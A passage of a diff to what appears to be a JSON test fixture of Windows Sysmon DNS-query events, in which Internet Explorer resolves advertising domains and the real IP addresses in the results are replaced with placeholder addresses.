@@ -6534,7 +6534,7 @@ "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054444800Z'/\u003e\u003cEventRecordID\u003e181\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.955\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003empp.vindicosuite.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:35.186.236.204;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054444800Z'/\u003e\u003cEventRecordID\u003e181\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.955\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003empp.vindicosuite.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" } }, { 
@@ -6543,7 +6543,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054454600Z'/\u003e\u003cEventRecordID\u003e182\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.955\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.1rx.io\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:8.41.222.152;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054454600Z'/\u003e\u003cEventRecordID\u003e182\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.955\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.1rx.io\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -6561,7 +6561,7 @@ "ProcessId": "2736", "QueryName": "sync.1rx.io", "QueryStatus": "0", - "QueryResults": "::ffff:8.41.222.152;" + "QueryResults": "::ffff:89.160.20.156;" }, "process": { "pid": 2828, 
@@ -6585,7 +6585,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054464900Z'/\u003e\u003cEventRecordID\u003e183\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.956\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.teads.tv\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 sync.teads.tv.edgekey.net;type: 5 e9957.g.akamaiedge.net;::ffff:23.52.160.7;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054464900Z'/\u003e\u003cEventRecordID\u003e183\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.956\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.teads.tv\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 sync.teads.tv.edgekey.net;type: 5 e9957.g.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "kind": "event", "provider": "Microsoft-Windows-Sysmon", "code": "22" @@ -6606,7 +6606,7 @@ "ProcessId": "2736", "QueryName": "sync.teads.tv", "QueryStatus": "0", - "QueryResults": "type: 5 sync.teads.tv.edgekey.net;type: 5 e9957.g.akamaiedge.net;::ffff:23.52.160.7;", + "QueryResults": "type: 5 sync.teads.tv.edgekey.net;type: 5 e9957.g.akamaiedge.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:07.956", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}" 
@@ -6644,7 +6644,7 @@ "ProcessId": "2736", "QueryName": "s.thebrighttag.com", "QueryStatus": "0", - "QueryResults": "type: 5 td.thebrighttag.com;::ffff:3.15.109.176;::ffff:52.15.225.252;::ffff:3.18.121.79;::ffff:3.15.101.187;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;", + "QueryResults": "type: 5 td.thebrighttag.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "channel": "Microsoft-Windows-Sysmon/Operational", 
@@ -6654,7 +6654,7 @@ "version": 5 }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054482800Z'/\u003e\u003cEventRecordID\u003e184\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.019\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003es.thebrighttag.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 td.thebrighttag.com;::ffff:3.15.109.176;::ffff:52.15.225.252;::ffff:3.18.121.79;::ffff:3.15.101.187;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054482800Z'/\u003e\u003cEventRecordID\u003e184\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.019\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003es.thebrighttag.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 td.thebrighttag.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "kind": "event", "provider": "Microsoft-Windows-Sysmon", "code": "22" 
@@ -6688,7 +6688,7 @@ "event_data": { "QueryName": "t.a3cloud.net", "QueryStatus": "0", - "QueryResults": "type: 5 d386jaag4hn9zl.cloudfront.net;::ffff:54.192.55.189;", + "QueryResults": "type: 5 d386jaag4hn9zl.cloudfront.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:08.050", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", 
@@ -6699,7 +6699,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053883400Z'/\u003e\u003cEventRecordID\u003e186\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.050\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003et.a3cloud.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 d386jaag4hn9zl.cloudfront.net;::ffff:54.192.55.189;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053883400Z'/\u003e\u003cEventRecordID\u003e186\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.050\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003et.a3cloud.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 d386jaag4hn9zl.cloudfront.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -6714,7 +6714,7 @@ "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053900700Z'/\u003e\u003cEventRecordID\u003e187\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.070\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etps618.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 nycp-hlb.doubleverify.com;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:204.154.111.122;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053900700Z'/\u003e\u003cEventRecordID\u003e187\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.070\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etps618.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 nycp-hlb.doubleverify.com;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" }, "winlog": { "level": "information", @@ -6727,7 +6727,7 @@ "ProcessId": "2736", "QueryName": "tps618.doubleverify.com", "QueryStatus": "0", - "QueryResults": "type: 5 nycp-hlb.doubleverify.com;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:204.154.111.122;", + "QueryResults": "type: 5 nycp-hlb.doubleverify.com;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "channel": "Microsoft-Windows-Sysmon/Operational", 
@@ -6762,7 +6762,7 @@ "ProcessId": "2736", "QueryName": "dpm.demdex.net", "QueryStatus": "0", - "QueryResults": "type: 5 gslb-2.demdex.net;type: 5 edge-va6.demdex.net;type: 5 dcs-edge-va6-802167536.us-east-1.elb.amazonaws.com;::ffff:54.157.69.185;::ffff:18.209.139.81;::ffff:18.233.36.36;::ffff:52.54.198.81;::ffff:52.55.201.28;::ffff:18.210.34.44;::ffff:52.72.163.149;::ffff:18.232.198.130;192.5.6.30;", + "QueryResults": "type: 5 gslb-2.demdex.net;type: 5 edge-va6.demdex.net;type: 5 dcs-edge-va6-802167536.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:08.090" }, 
@@ -6780,7 +6780,7 @@ } }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053914100Z'/\u003e\u003cEventRecordID\u003e188\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.090\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edpm.demdex.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 gslb-2.demdex.net;type: 5 edge-va6.demdex.net;type: 5 dcs-edge-va6-802167536.us-east-1.elb.amazonaws.com;::ffff:54.157.69.185;::ffff:18.209.139.81;::ffff:18.233.36.36;::ffff:52.54.198.81;::ffff:52.55.201.28;::ffff:18.210.34.44;::ffff:52.72.163.149;::ffff:18.232.198.130;192.5.6.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053914100Z'/\u003e\u003cEventRecordID\u003e188\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.090\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edpm.demdex.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 gslb-2.demdex.net;type: 5 edge-va6.demdex.net;type: 5 